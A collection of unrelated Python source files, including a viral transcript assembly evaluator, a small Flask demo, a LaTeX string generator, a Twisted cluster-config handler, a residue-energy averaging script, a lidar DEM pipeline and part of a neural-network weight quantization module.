elif line.startswith('>path') or line.startswith('>Path'):
if flag:
assert(self.graph.getPathIndex(path) == pathIndex)
self.paths.append(tuple(path))
self.path_abundances.append(pathAbundance)
self.path_indices.append(pathIndex)
else:
flag = True
path = []
pathIndex = int(line.rstrip(
'\n').split(':')[0].split('_')[1])
pathAbundance = float(line.rstrip('\n').split(':')[1])
elif flag:
data = line.rstrip('\n').split('\t')
left_node_name = data[0]
right_node_name = data[1]
edge_type = data[2]
curr_edge = [edge for edge in self.graph.edges if (edge.left.name == left_node_name and
edge.right.name == right_node_name and
edge.type == edge_type)]
assert(len(curr_edge) == 1)
path.append(curr_edge[0])
if flag:
assert(self.graph.getPathIndex(path) == pathIndex)
self.paths.append(tuple(path))
self.path_abundances.append(pathAbundance)
self.path_indices.append(pathIndex)
self.npaths = len(self.paths)
self.pathCounter = Counter(
dict(zip(self.path_indices, self.path_abundances)))
if matching_fname:
self.matching = {}
with open(matching_fname, 'r') as inp:
for line in inp:
if line.startswith('>'):
pathIndex = int(line.rstrip('\n').split('_')[1])
self.matching[pathIndex] = {}
else:
data = line.rstrip('\n').split('\t')
phaseID = int(data[0])
count = int(data[1])
self.matching[pathIndex][phaseID] = count
class alternate_solution():
def __init__(self, fname, gtf=False):
if gtf:
self.read_gtf_file(fname)
else:
# self.read_gtf_file(fname)
self.read_jumper_file(fname)
def read_jumper_file(self, fname):
self.path_jump_dict = {}
self.path_abundances_dict = {}
self.path_exon_dict = {}
key = None
with open(fname, 'r') as inp:
for line in inp:
if line.startswith('>'):
key = line.rstrip('\n').split('>')[-1].split('\t')[0]
if key in self.path_jump_dict.keys():
raise Exception(f"repeated entries {key}")
else:
self.path_jump_dict[key] = []
self.path_abundances_dict[key] = float(
line.rstrip('\n').split(':')[1])
else:
if not key:
raise Exception(f"no identifier found at line: {line}")
edgetype = line.rstrip('\n').split('\t')[-1]
if edgetype == 'splice':
left = int(line.split('\t')[0].split(
',')[-1].rstrip(']'))
right = int(line.split('\t')[
1].split(',')[0].lstrip('['))
self.path_jump_dict[key].append((left, right))
# remove 0 weight paths
remove_keys = [
k for k, v in self.path_abundances_dict.items() if v == 0]
for key in remove_keys:
del self.path_abundances_dict[key]
del self.path_jump_dict[key]
for key, val in self.path_jump_dict.items():
self.path_exon_dict[key] = []
if len(val) == 0:
self.path_exon_dict[key].append((1, 29903))
else:
for idx in range(len(val)):
if idx == 0:
self.path_exon_dict[key].append((1, val[idx][0]))
else:
self.path_exon_dict[key].append(
(val[idx-1][-1], val[idx][0]))
self.path_exon_dict[key].append((val[-1][-1], 29903))
self.path_length_dict = {}
for key, exons in self.path_exon_dict.items():
self.path_length_dict[key] = 0
for exon in exons:
self.path_length_dict[key] += exon[1] - exon[0] + 1
def read_gtf_file(self, fname):
self.path_jump_dict = {}
self.path_abundances_dict = {}
self.path_exon_dict = {}
df = pd.read_csv(fname, sep='\t', header=None, comment='#')
path_rpkm_dict = {}
transcript_id = 0
for _, row in df.iterrows():
if row[2] == 'transcript':
key = f"transcript_{transcript_id}"
transcript_id += 1
entry_dict = {entry.lstrip(' ').split(' ')[0]: entry.lstrip(' ').split(' ')[-1][1:-1]
for entry in row[8].split(';')}
if 'RPKM' in entry_dict.keys():
path_rpkm_dict[key] = float(entry_dict['RPKM'])
elif 'TPM' in entry_dict.keys():
path_rpkm_dict[key] = float(entry_dict['TPM'])
else:
raise Exception(
f"TPM or RKPM not found in gtf file in the following row\n {row}")
self.path_exon_dict[key] = []
else:
self.path_exon_dict[key].append((int(row[3]), int(row[4])))
total_rpkm = sum(path_rpkm_dict.values())
self.path_abundances_dict = {
key: val / total_rpkm for key, val in path_rpkm_dict.items()}
for key, val in self.path_exon_dict.items():
self.path_jump_dict[key] = []
for idx in range(len(val)-1):
self.path_jump_dict[key].append((val[idx][-1], val[idx+1][0]))
self.path_length_dict = {}
for key, exons in self.path_exon_dict.items():
self.path_length_dict[key] = 0
for exon in exons:
self.path_length_dict[key] += exon[1] - exon[0] + 1
def top_k_jump_dict(self, kdx, length=29903):
chosen_keys = [key for key, path_jumps in sorted(self.path_jump_dict.items(),
key=lambda x: (-self.path_abundances_dict[x[0]] * self.path_length_dict[x[0]], -self.path_length_dict[x[0]]))][:kdx]
return {k: self.path_jump_dict[k] for k in chosen_keys}
def top_k_jump_list(self, kdx, length=29903):
chosen_keys = [key for key, path_jumps in sorted(self.path_jump_dict.items(),
key=lambda x: (-self.path_abundances_dict[x[0]] * self.path_length_dict[x[0]], -self.path_length_dict[x[0]]))][:kdx]
return [self.path_jump_dict[k] for k in chosen_keys]
def top_k_perc_jump_dict(self, k, length=29903):
kdx = max(1, math.ceil(len(self.path_jump_dict) * k / 100))
chosen_keys = [key for key, path_jumps in sorted(self.path_jump_dict.items(),
key=lambda x: (-self.path_abundances_dict[x[0]] * self.path_length_dict[x[0]], -self.path_length_dict[x[0]]))][:kdx]
return {k: self.path_jump_dict[k] for k in chosen_keys}
class evaluator():
def __init__(self, ground_fname):
self.read_ground_truth_file(ground_fname)
self.solutions = {}
self.alternate_solutions = {}
def read_ground_truth_file(self, fname):
self.path_jump_dict = {}
path_counts = {}
self.path_exon_dict = {}
self.path_length_dict = {}
key = None
with open(fname, 'r') as inp:
for line in inp:
if line.startswith('>'):
key = line.rstrip('\n').split('>')[-1].split(':')[0]
if key in self.path_jump_dict.keys():
raise Exception(f"repeated entries {key}")
else:
self.path_jump_dict[key] = []
path_counts[key] = float(
line.rstrip('\n').split(':')[1])
else:
if not key:
raise Exception(f"no identifier found at line: {line}")
edgetype = line.rstrip('\n').split('\t')[-1]
if edgetype == 'splice':
left = int(line.split('\t')[0].split(
',')[-1].rstrip(']'))
right = int(line.split('\t')[
1].split(',')[0].lstrip('['))
self.path_jump_dict[key].append((left, right))
for key, val in self.path_jump_dict.items():
self.path_exon_dict[key] = []
for idx in range(len(val)):
if idx == 0:
self.path_exon_dict[key].append((1, val[idx][0]))
else:
self.path_exon_dict[key].append(
(val[idx-1][-1], val[idx][0]))
if len(val) > 0:
self.path_exon_dict[key].append((val[-1][-1], 29903))
else:
self.path_exon_dict[key].append((1, 29903))
total_counts = sum(path_counts.values())
self.path_abundances_dict = {
key: val / total_counts for key, val in path_counts.items()}
self.path_length_dict = {}
for key, exons in self.path_exon_dict.items():
self.path_length_dict[key] = 0
for exon in exons:
self.path_length_dict[key] += exon[1] - exon[0] + 1
def top_k_jump_dict(self, kdx, length=29903):
chosen_keys = [key for key, path_jumps in sorted(self.path_jump_dict.items(),
key=lambda x: (-self.path_abundances_dict[x[0]] * self.path_length_dict[x[0]], -self.path_length_dict[x[0]]))][:kdx]
return {k: self.path_jump_dict[k] for k in chosen_keys}
def top_k_jump_list(self, kdx, length=29903):
chosen_keys = [key for key, path_jumps in sorted(self.path_jump_dict.items(),
key=lambda x: (-self.path_abundances_dict[x[0]] * self.path_length_dict[x[0]], -self.path_length_dict[x[0]]))][:kdx]
return [self.path_jump_dict[k] for k in chosen_keys]
def getCaonicalCount(self, ref, tolerance=6):
canonical = 0
noncanonical = 0
for key, jumps in self.path_jump_dict.items():
if evaluator.getORF(ref, jumps, tolerance) == 'non-canonical':
noncanonical += 1
else:
canonical += 1
return canonical, noncanonical
@staticmethod
def getORF(ref, jumps, tolerance=6):
sgRNAs_from_pos = {
21562: "S",
25392: "3a",
26244: "E",
26522: "M",
27201: "6",
27393: "7a",
27755: "7b",
27893: "8",
28273: "N",
29557: "10"
}
if len(jumps) == 1:
left_pos = jumps[0][0]
right_pos = jumps[0][1]
codon_pos = ref.fetch(
ref.references[0], right_pos, ref.lengths[0]).find('ATG') + right_pos
if 55 - tolerance <= left_pos <= 85 + tolerance and codon_pos in sgRNAs_from_pos.keys():
return sgRNAs_from_pos[codon_pos]
else:
return 'non-canonical'
else:
return 'non-canonical'
def add_solution(self, sol_id, fname, matching_fname=None):
if sol_id not in self.solutions.keys():
self.solutions[sol_id] = solution(
self.graph, fname, matching_fname)
else:
raise Exception(f"sol_id {sol_id} already exists!")
def add_alternate_solution(self, sol_id, fname, gtf=False):
if sol_id not in self.alternate_solutions.keys():
self.alternate_solutions[sol_id] = alternate_solution(fname, gtf)
else:
raise Exception(f"alternate_sol_id {sol_id} already exists!")
@staticmethod
def check_match(source, target, tolerance=10):
if len(source) == len(target):
flag = True
for idx in range(len(source)):
source_left = source[idx][0]
source_right = source[idx][1]
target_left = target[idx][0]
target_right = target[idx][1]
if abs(source_left - target_left) > tolerance or abs(source_right - target_right) > tolerance:
flag = False
break
return flag
else:
return False
@staticmethod
def comparedtranscript_abundance(source_dict, source_abundance,
target_dict, target_abundance, tolerance=10):
match_error = 0
unmatch_error = 0
unmatched_key_set = set(target_dict.keys())
# print(f"{len(unmatched_key_set)}")
error_dict = target_abundance.copy()
for source_key, source_transcript in source_dict.items():
match_key_list = []
for target_key, target_transcript in target_dict.items():
if evaluator.check_match(source_transcript, target_transcript, tolerance):
match_key_list.append(target_key)
nmatches = len(match_key_list)
if nmatches >= 1:
for target_key in match_key_list:
#match_error += (target_abundance[target_key] - source_abundance[source_key] / nmatches)**2
error_dict[target_key] -= source_abundance[source_key] / nmatches
unmatched_key_set = unmatched_key_set.difference(match_key_list)
# print('-'*50)
# print(f"{len(unmatched_key_set)}")
# print('-'*50)
for target_key in unmatched_key_set:
unmatch_error += target_abundance[target_key]**2
return match_error, unmatch_error, sum([val**2 for val in error_dict.values()])
@staticmethod
def unique_transcripts(source_dict, target_dict, tolerance=10):
unmatched_key_set = set(target_dict.keys())
for source_key, source_transcript in source_dict.items():
for target_key, target_transcript in target_dict.items():
if evaluator.check_match(source_transcript, target_transcript, tolerance):
unmatched_key_set = unmatched_key_set.difference([
target_key])
break
return len(target_dict.keys()) - len(unmatched_key_set)
@staticmethod
def unique_canonical_noncanonical_from_jumps(source_dict, target_dict, ref, tolerance=10):
unmatched_key_set = set(target_dict.keys())
for source_key, source_transcript in source_dict.items():
for target_key, target_transcript in target_dict.items():
if evaluator.check_match(source_transcript, target_transcript, tolerance):
unmatched_key_set = unmatched_key_set.difference([
target_key])
break
canonical_count = 0
noncanonical_count = 0
for target_key, target_transcript in target_dict.items():
if target_key not in unmatched_key_set:
curr_orf = evaluator.getORF(ref, target_transcript)
if curr_orf == 'non-canonical':
noncanonical_count += 1
else:
canonical_count += 1
return canonical_count, noncanonical_count
@staticmethod
def compare_transcripts(source, target, tolerance=10):
true_pos = 0
false_pos = 0
for source_transcript in source:
flag = False
for target_transcript in target:
if evaluator.check_match(source_transcript, target_transcript, tolerance):
true_pos += 1
flag = True
break
if not flag:
false_pos += 1
return true_pos, false_pos
def get_false_negative_exons(self, source, tolerance=10):
false_neg = 0
for target_transcript in self.path_exon_dict.values():
flag = False
for source_transcript in source:
if check_match(target_transcript, source_transcript, tolerance):
flag = True
break
if not flag:
false_neg += 1
return false_neg
|
from flask import Flask, render_template
app = Flask(__name__)
@app.route('/name/<string:name>', methods=['GET'])
def name(name):
return render_template('name.html', name=name)
@app.route('/if/<string:name>', methods=['GET'])
def test_if(name):
return render_template('if.html', name=name)
@app.route('/stu')
def stu():
stu_lst = [
{'name': '小明', 'age': 14, 'score': 98},
{'name': '小刚', 'age': 13, 'score': 95},
{'name': '小红', 'age': 15, 'score': 96}
]
return render_template('stu.html', stu_lst=stu_lst)
if __name__ == '__main__':
app.run(debug=True) |
r3=["A_{lm_3}^{\kk *}u_{l_3}^*(r)","B_{lm_3}^{\kk^*}\dot{u}_{l_3}^*(r)",\
"C_{lm_3}^{\kk^*}R^{lo*}_{lm_3}(r)","D_{lm_3}^{\kk^*}\dot{R}^{lo*}_{lm_3}(r)"]
r4=["A_{lm_4}^{\kkp}u_{l_4}(r)","B_{lm_4}^{\kkp}\dot{u}_{l_4}(r)",\
"C_{lm_4}^{\kkp}R^{lo}_{lm_4}(r)","D_{lm_4}^{\kkp}\dot{R}^{lo}_{lm_4}(r)"]
r5=["A_{lm_5}^{\kkp *}u_{l_5}^*(r')","B_{lm_5}^{\kkp *}\dot{u}_{l_5}^*(r')",\
"C_{lm_5}^{\kkp^*}R^{lo*}_{lm_5}(r')","D_{lm_5}^{\kkp^*}\dot{R}^{lo*}_{lm_5}(r')"]
r6=["A_{lm_6}^{\kk }u_{l_6}(r')","B_{lm_6}^{\kk}\dot{u}_{l_6}(r')",\
"C_{lm_6}^{\kk}R^{lo}_{lm_6}(r')","D_{lm_6}^{\kk}\dot{R}^{lo}_{lm_6}(r')"]
nr=0
r,rp="",""
for i in r3:
for j in r4:
for k in r5:
for l in r6:
w=i+j+k+l+'+'
if r3[0] in w and r4[0] in w: r+= "r_int34[0],"
if r3[0] in w and r4[1] in w: r+= "r_int34[1],"
if r3[0] in w and r4[2] in w: r+= "r_int34[2],"
if r3[0] in w and r4[3] in w: r+= "r_int34[3],"
if r3[1] in w and r4[0] in w: r+= "r_int34[4],"
if r3[1] in w and r4[1] in w: r+= "r_int34[5],"
if r3[1] in w and r4[2] in w: r+= "r_int34[6],"
if r3[1] in w and r4[3] in w: r+= "r_int34[7],"
if r3[2] in w and r4[0] in w: r+= "r_int34[8],"
if r3[2] in w and r4[1] in w: r+= "r_int34[9],"
if r3[2] in w and r4[2] in w: r+= "r_int34[10],"
if r3[2] in w and r4[3] in w: r+= "r_int34[11],"
if r3[3] in w and r4[0] in w: r+= "r_int34[12],"
if r3[3] in w and r4[1] in w: r+= "r_int34[13],"
if r3[3] in w and r4[2] in w: r+= "r_int34[14],"
if r3[3] in w and r4[3] in w: r+= "r_int34[15],"
nr+=1
if nr%3==0:
w+="\\\ &"
r+="\\\n"
print r
for i in r3:
for j in r4:
for k in r5:
for l in r6:
w=i+j+k+l+'+'
if r5[0] in w and r6[0] in w: rp+= "r_int56[0],"
if r5[0] in w and r6[1] in w: rp+= "r_int56[1],"
if r5[0] in w and r6[2] in w: rp+= "r_int56[2],"
if r5[0] in w and r6[3] in w: rp+= "r_int56[3],"
if r5[1] in w and r6[0] in w: rp+= "r_int56[4],"
if r5[1] in w and r6[1] in w: rp+= "r_int56[5],"
if r5[1] in w and r6[2] in w: rp+= "r_int56[6],"
if r5[1] in w and r6[3] in w: rp+= "r_int56[7],"
if r5[2] in w and r6[0] in w: rp+= "r_int56[8],"
if r5[2] in w and r6[1] in w: rp+= "r_int56[9],"
if r5[2] in w and r6[2] in w: rp+= "r_int56[10],"
if r5[2] in w and r6[3] in w: rp+= "r_int56[11],"
if r5[3] in w and r6[0] in w: rp+= "r_int56[12],"
if r5[3] in w and r6[1] in w: rp+= "r_int56[13],"
if r5[3] in w and r6[2] in w: rp+= "r_int56[14],"
if r5[3] in w and r6[3] in w: rp+= "r_int56[15],"
nr+=1
if nr%3==0:
w+="\\\ &"
rp+="\\\n"
print rp
kk=""
for i in r3:
for j in r4:
for k in r5:
for l in r6:
w=i+j+k+l+'+'
if r3[0] in w and r6[0] in w: kk+= "k_int36[0],"
if r3[0] in w and r6[1] in w: kk+= "k_int36[1],"
if r3[0] in w and r6[2] in w: kk+= "k_int36[2],"
if r3[0] in w and r6[3] in w: kk+= "k_int36[3],"
if r3[1] in w and r6[0] in w: kk+= "k_int36[4],"
if r3[1] in w and r6[1] in w: kk+= "k_int36[5],"
if r3[1] in w and r6[2] in w: kk+= "k_int36[6],"
if r3[1] in w and r6[3] in w: kk+= "k_int36[7],"
if r3[2] in w and r6[0] in w: kk+= "k_int36[8],"
if r3[2] in w and r6[1] in w: kk+= "k_int36[9],"
if r3[2] in w and r6[2] in w: kk+= "k_int36[10],"
if r3[2] in w and r6[3] in w: kk+= "k_int36[11],"
if r3[3] in w and r6[0] in w: kk+= "k_int36[12],"
if r3[3] in w and r6[1] in w: kk+= "k_int36[13],"
if r3[3] in w and r6[2] in w: kk+= "k_int36[14],"
if r3[3] in w and r6[3] in w: kk+= "k_int36[15],"
nr+=1
if nr%3==0:
w+="\\\ &"
kk+="\\\n"
print kk
kp=""
for i in r3:
for j in r4:
for k in r5:
for l in r6:
w=i+j+k+l+'+'
if r4[0] in w and r5[0] in w: kp+= "k_int45[0],"
if r4[0] in w and r5[1] in w: kp+= "k_int45[1],"
if r4[0] in w and r5[2] in w: kp+= "k_int45[2],"
if r4[0] in w and r5[3] in w: kp+= "k_int45[3],"
if r4[1] in w and r5[0] in w: kp+= "k_int45[4],"
if r4[1] in w and r5[1] in w: kp+= "k_int45[5],"
if r4[1] in w and r5[2] in w: kp+= "k_int45[6],"
if r4[1] in w and r5[3] in w: kp+= "k_int45[7],"
if r4[2] in w and r5[0] in w: kp+= "k_int45[8],"
if r4[2] in w and r5[1] in w: kp+= "k_int45[9],"
if r4[2] in w and r5[2] in w: kp+= "k_int45[10],"
if r4[2] in w and r5[3] in w: kp+= "k_int45[11],"
if r4[3] in w and r5[0] in w: kp+= "k_int45[12],"
if r4[3] in w and r5[1] in w: kp+= "k_int45[13],"
if r4[3] in w and r5[2] in w: kp+= "k_int45[14],"
if r4[3] in w and r5[3] in w: kp+= "k_int45[15],"
nr+=1
if nr%3==0:
w+="\\\ &"
kp+="\\\n"
print kp
|
from twisted.internet import defer
from igs_tx.utils import defer_utils
from igs_tx.utils import defer_pipe
from vappio_tx.utils import queue
@defer_utils.timeIt
@defer.inlineCallbacks
def handleConfig(request):
"""
Returns the config for a single cluster in the system.
Throws an error if the cluster is not found.
Input:
{ cluster_name : string
user_name : string
}
Output:
config - keyvalues
"""
persistManager = request.state.persistManager
cluster = yield persistManager.loadCluster(request.body['cluster_name'],
request.body['user_name'])[0]
clusterDict = persistManager.clusterToDict(cluster)
defer.returnValue(request.update(response=clusterDict['config']))
def subscribe(mq, state):
processPipe = defer_pipe.pipe([queue.keysInBody(['user_name',
'cluster_name']),
handleConfig])
processClusterConfig = queue.returnResponse(processPipe)
queue.subscribe(mq,
state.conf('clusters.config_www'),
state.conf('clusters.concurrent_config'),
queue.wrapRequestHandler(state, processClusterConfig))
|
#! /usr/bin/env python3
# 2017.5.23.
def add_name_dict(namedict,resnumber,resname,restype): # add resname in 'residue name list'
# {resnumber : [resname,[restype1,restype2]]} i.e. {1: [ ALA,[Main,Side] ]}
namedict_key = namedict.keys()
if resnumber not in namedict_key:
namedict[resnumber] = (resname,[restype])
else:
name_tuple = namedict[resnumber]
if restype not in name_tuple[1]:
restype_list = name_tuple[1]
restype_list.append(restype)
namedict[resnumber] = (resname,restype_list)
def add_value_dict(valuedict,resid1,resid2,ecvalue): # add ec value in 'ec value dict'
# ec valuedict {(res1,res2) : [value list]}
valuedict_key = valuedict.keys()
pair = (resid1,resid2)
if pair in valuedict_key:
value_list = valuedict[pair]
value_list.append(ecvalue)
else:
value_list = [ ecvalue ]
valuedict[pair] = value_list
def gen_line_data(filename):
try:
f = open(filename,'r')
except:
print("Can't Open file : {0}".format(filename))
exit()
else:
for line in f:
l = line.split()
res1,res2,value = l[0],l[1],float(l[2])
yield res1,res2,value
f.close()
def resid_converter(resid): #resid = 'resnumber_resname' i.e. '00012_ALA' or '00004_GLU-Side'
res = resid.split('_')
resnumber,resname = int(res[0]),res[1]
if '-' in resname:
resname = resname.split('-')
restype = resname[-1]
resname = resname[0]
else:
restype = None
return resnumber,resname,restype
def input_data(file_list):
name_dict = {}
ec_dict = {}
print("data file")
for filenumber,filename in enumerate(file_list):
for res1,res2,value in gen_line_data(filename):
num1,name1,type1 = resid_converter(res1)
num2,name2,type2 = resid_converter(res2)
add_name_dict(name_dict,num1,name1,type1)
add_name_dict(name_dict,num2,name2,type2)
add_value_dict(ec_dict,(num1,type1),(num2,type2),value)
print("{0:0>3} : {1}".format(filenumber,filename))
return name_dict,ec_dict
def calc_data(value_list,value_number):
import math
value_sum = 0
value_sqr = 0
for value in value_list:
value_sum += value
value_sqr += value**2
value_avg = value_sum/value_number
value_sqr = value_sqr/value_number
value_var = value_sqr - value_avg**2
value_dev = math.sqrt(value_var)
return value_avg,value_dev
def gen_output_name(resnumber,resname,restype):
if restype == None:
output_name = "{0:0>5}_{1}".format(resnumber,resname)
else:
output_name = "{0:0>5}_{1}".format(resnumber,resname+'-'+restype)
return output_name
def gen_output_line(name_dict,ec_dict,value_number):
resid_list = list(name_dict.keys())
resid_list.sort()
for i,resnumber1 in enumerate(resid_list):
resid1 = name_dict[resnumber1]
resname1 = resid1[0]
restype_list1 = resid1[1]
resid_pair_list = resid_list.copy()
resid_pair_list = resid_pair_list[i+1:]
for restype1 in restype_list1:
for resnumber2 in resid_pair_list:
#if resnumber2 >= resnumber1: continue
resid2 = name_dict[resnumber2]
resname2 = resid2[0]
restype_list2 = resid2[1]
for restype2 in restype_list2:
ec_dict_key = ec_dict.keys()
pair = ((resnumber1,restype1),(resnumber2,restype2))
if pair not in ec_dict_key: continue
value_list = ec_dict[((resnumber1,restype1),(resnumber2,restype2))]
value_avg,value_dev = calc_data(value_list,value_number)
output_name1 = gen_output_name(resnumber1,resname1,restype1)
output_name2 = gen_output_name(resnumber2,resname2,restype2)
outputline = " {0} {1} {2} {3}\n".format(output_name1,output_name2,value_avg,value_dev)
yield outputline
def main():
import sys
if len(sys.argv)==1:
print('USAGE : ./average.py [ec data files ..]')
exit()
# get input file names
file_list = sys.argv[1:]
value_number = len(file_list)
avg_file = 'ec_average.dat'
# data dicts
name_dict = {}
ec_dict = {}
name_dict,ec_dict = input_data(file_list)
#print(name_dict)
#print(ec_dict)
# output data
of = open(avg_file,'w')
for outputline in gen_output_line(name_dict,ec_dict,value_number):
of.write(outputline)
#print(outputline)
of.close()
if __name__ == '__main__':
main()
|
import argparse
import os
import gdal
from basin_data import BASINS_BOUNDARIES, BASIN_EPSG
from pdal_pipeline import PdalPipeline
LAZ_TO_DEM_OUTFILE = '{0}_masked_1m.tif'
DEM_COMPRESSED_OUTFILE = '{0}_masked_1m_c.tif'
SAVE_MESSAGE = 'Saved output to:\n {0}\n'
parser = argparse.ArgumentParser()
parser.add_argument(
'--sfm-laz',
type=argparse.FileType('r'),
help='Path to lidar point cloud',
required=True
)
parser.add_argument(
'--casi-mask',
type=argparse.FileType('r'),
help='Path to CASI mask',
required=True
)
parser.add_argument(
'--envi-mask',
type=argparse.FileType('r'),
help='Path to ENVI mask',
required=True
)
parser.add_argument(
'--basin',
type=str,
choices=BASINS_BOUNDARIES.keys(),
help='String to indicate basin. Will select boundary info and EPSG codes',
required=True
)
if __name__ == '__main__':
arguments = parser.parse_args()
output_file = os.path.splitext(arguments.sfm_laz.name)[0]
output_file = os.path.join(
os.path.dirname(arguments.sfm_laz.name), output_file
)
print('Creating DEM')
dem_pipeline = PdalPipeline(arguments.sfm_laz.name)
print('Masking out vegetation')
dem_pipeline.add(PdalPipeline.mask_casi(arguments.casi_mask.name))
dem_pipeline.add(PdalPipeline.mask_envi(arguments.envi_mask.name))
dem_pipeline.add(PdalPipeline.create_dem(
outfile=LAZ_TO_DEM_OUTFILE.format(output_file),
bounds=BASINS_BOUNDARIES[arguments.basin],
epsg=BASIN_EPSG[arguments.basin]
))
print('Creating DEM')
dem_pipeline.execute()
del dem_pipeline
print(SAVE_MESSAGE.format(LAZ_TO_DEM_OUTFILE.format(output_file)))
print('Compressing tif')
gdal.Translate(
DEM_COMPRESSED_OUTFILE.format(output_file),
gdal.Open(LAZ_TO_DEM_OUTFILE.format(output_file), gdal.GA_ReadOnly),
creationOptions=["COMPRESS=LZW", "TILED=YES",
"BIGTIFF=IF_SAFER", "NUM_THREADS=ALL_CPUS"]
)
print(SAVE_MESSAGE.format(DEM_COMPRESSED_OUTFILE.format(output_file)))
|
# Copyright (c) 2019 ETH Zurich, Lukas Cavigelli
import math
import itertools
import torch
import torch.nn as nn
import quantlab.indiv as indiv
class INQController(indiv.Controller):
"""Instantiate typically once per network, provide it with a list of INQ
modules to control and a INQ schedule, and insert a call to the step
function once per epoch. """
def __init__(self, modules, schedule, clearOptimStateOnStep=False,
stepEveryEpoch=False, rescaleWeights=False):
super().__init__()
self.modules = modules
schedule = {int(k): v for k, v in schedule.items()} #parse string keys to ints
self.schedule = schedule # dictionary mapping epoch to fraction
self.clearOptimStateOnStep = clearOptimStateOnStep
self.fraction = 0.0
self.stepEveryEpoch = stepEveryEpoch
self.rescaleWeights = rescaleWeights
def step_preTraining(self, epoch, optimizer=None, tensorboardWriter=None):
if epoch in self.schedule.keys():
self.fraction = self.schedule[epoch]
elif self.stepEveryEpoch:
pass
else:
return
#log to tensorboard
if tensorboardWriter != None:
tensorboardWriter.add_scalar('INQ/fraction',
self.fraction, global_step=epoch)
#step each INQ module
for m in self.modules:
m.step(self.fraction)
#clear optimizer state (e.g. Adam's momentum)
if self.clearOptimStateOnStep and optimizer != None:
optimizer.state.clear()
def step_postOptimStep(self, *args, **kwargs):
if self.rescaleWeights:
for m in self.modules:
m.weightInqCtrl.rescaleWeights()
@staticmethod
def getInqModules(net):
return [m
for m in net.modules()
if (isinstance(m, INQLinear) or isinstance(m, INQConv1d) or
isinstance(m, INQConv2d))]
class INQParameterController:
"""Used to implement INQ functionality within a custom layer (e.g. INQConv2d).
Creates and register all relevant fields and parameters in the module. """
def __init__(self, module, parameterName, numLevels=3,
strategy="magnitude", backCompat=True,
quantInitMethod=None):#'uniform-l1opt'
self.module = module
self.parameterName = parameterName
self.backCompat = backCompat
self.numLevels = numLevels
self.strategy = strategy # "magnitude" or "random" or "magnitude-SRQ"/"RPR"
self.fraction = 0.0
self.quantInitMethod = quantInitMethod
if self.backCompat:
assert(parameterName == 'weight')
assert(not hasattr(module, 'weightFrozen'))
assert(not hasattr(module, 'sParam'))
self.pnameFrozen = 'weightFrozen'
self.pnameS = 'sParam'
else:
#more structured; adds support for multiple indep. INQ parameters
self.pnameFrozen = parameterName + '_inqFrozen'
self.pnameS = parameterName + '_inqS'
module.__setattr__(self.pnameFrozen,
nn.Parameter(torch.full_like(self.weight, float('NaN')),
requires_grad=False))
module.__setattr__(self.pnameS,
nn.Parameter(torch.full((1,), float('NaN')).to(self.weight),
requires_grad=False))
def getWeightParams(self, module):
weight = module.__getattr__(self.parameterName)
weightFrozen = module.__getattr__(self.pnameFrozen)
return weight, weightFrozen
@property
def weight(self):
return self.module.__getattr__(self.parameterName)
@property
def weightFrozen(self):
return self.module.__getattr__(self.pnameFrozen)
@property
def sParam(self):
return self.module.__getattr__(self.pnameS)
@property
def s(self):
return self.sParam.item()
@s.setter
def s(self, value):
self.sParam[0] = value
@staticmethod
def inqQuantize(weight, quantLevels):
"""Quantize a single weight using the INQ quantization scheme."""
bestQuantLevel = torch.zeros_like(weight)
minQuantError = torch.full_like(weight, float('inf'))
for ql in quantLevels:
qerr = (weight-ql).abs()
mask = qerr < minQuantError
bestQuantLevel[mask] = ql
minQuantError[mask] = qerr[mask]
quantizedWeight = bestQuantLevel
return quantizedWeight
def inqStep(self, fraction):
if self.quantInitMethod == None:
#update s
if self.fraction == 0.0 and math.isnan(self.s):
self.s = torch.max(torch.abs(self.weight.data)).item()
#compute quantization levels
n_1 = math.floor(math.log((4*self.s)/3, 2))
n_2 = int(n_1 + 2 - (self.numLevels // 2))
if self.numLevels >= 3:
quantLevelsPos = (2**i for i in range(n_2, n_1+1))
quantLevelsNeg = (-2**i for i in range(n_2, n_1+1))
quantLevels = itertools.chain(quantLevelsPos, [0], quantLevelsNeg)
else:
assert(self.numLevels == 2)
quantLevels = [self.s/2, -self.s/2]#[2**n_2, -2**n_2]
elif self.quantInitMethod == 'uniform':
# update s
if self.fraction == 0.0 and math.isnan(self.s):
self.s = torch.max(torch.abs(self.weight.data)).item()
#compute quantization levels
quantLevels = torch.linspace(-self.s, self.s, steps=self.numLevels)
elif self.quantInitMethod in ['uniform-l1opt',
'uniform-l2opt',
'uniform-perCh-l2opt',
'uniform-linfopt']:
getQLs = lambda s: torch.linspace(-s, s, steps=self.numLevels)
if self.fraction == 0.0 and math.isnan(self.s):
import scipy.optimize
def optimWeight(weight):
def loss(s):
s = s.item()
qls = getQLs(s)
for i, ql in enumerate(qls):
tmp = (weight-ql).abs()
if i == 0:
minQuantErr = tmp
else:
minQuantErr = torch.min(minQuantErr, tmp)
if self.quantInitMethod == 'uniform-l1opt':
return minQuantErr.norm(p=1).item()
elif self.quantInitMethod in ['uniform-l2opt', 'uniform-perCh-l2opt']:
return minQuantErr.norm(p=2).item()
elif self.quantInitMethod == 'uniform-linfopt':
return minQuantErr.norm(p=float('inf')).item()
else:
assert(False)
bounds = (1e-6, weight.abs().max().item())
optRes = scipy.optimize.brute(loss, ranges=(bounds,),
Ns=1000, disp=True,
finish=scipy.optimize.fmin)
s = optRes[0]
weight.mul_(1/s)
s = 1
return s
if self.quantInitMethod in ['uniform-l1opt',
'uniform-l2opt',
'uniform-linfopt']:
self.s = optimWeight(self.weight.data.flatten().detach())
elif self.quantInitMethod in ['uniform-perCh-l2opt']:
self.s = 1
for c in range(self.weight.size(0)):
optimWeight(self.weight.data[c].flatten().detach())
quantLevels = getQLs(self.s)
else:
assert(False)
self.fraction = fraction
if self.strategy == "magnitude-SRQ" or self.strategy == "RPR":
if self.fraction == None:
return
#get current weights quantized
self.weightFrozen.data.copy_(self.inqQuantize(self.weight.data, quantLevels))
numUnFreeze = int((1-self.fraction)*self.weight.numel())
idxsUnFreeze = torch.randperm(self.weight.numel())[:numUnFreeze]
self.weightFrozen.data.flatten()[idxsUnFreeze] = float('NaN')
else:
#get number of weights to quantize
prevCount = self.weightFrozen.numel() - torch.isnan(self.weightFrozen.data).sum(dtype=torch.long).item()
newCount = int(self.fraction*self.weightFrozen.numel())
#find indexes of weights to quant
if self.strategy == "magnitude":
self.weight.data[~torch.isnan(self.weightFrozen.data)].fill_(0)
_, idxsSorted = self.weight.data.flatten().abs().sort(descending=True)
elif self.strategy == "random":
idxsSorted = torch.randperm(self.weight.numel())
else:
assert(False)
idxsFreeze = idxsSorted[:newCount-prevCount]
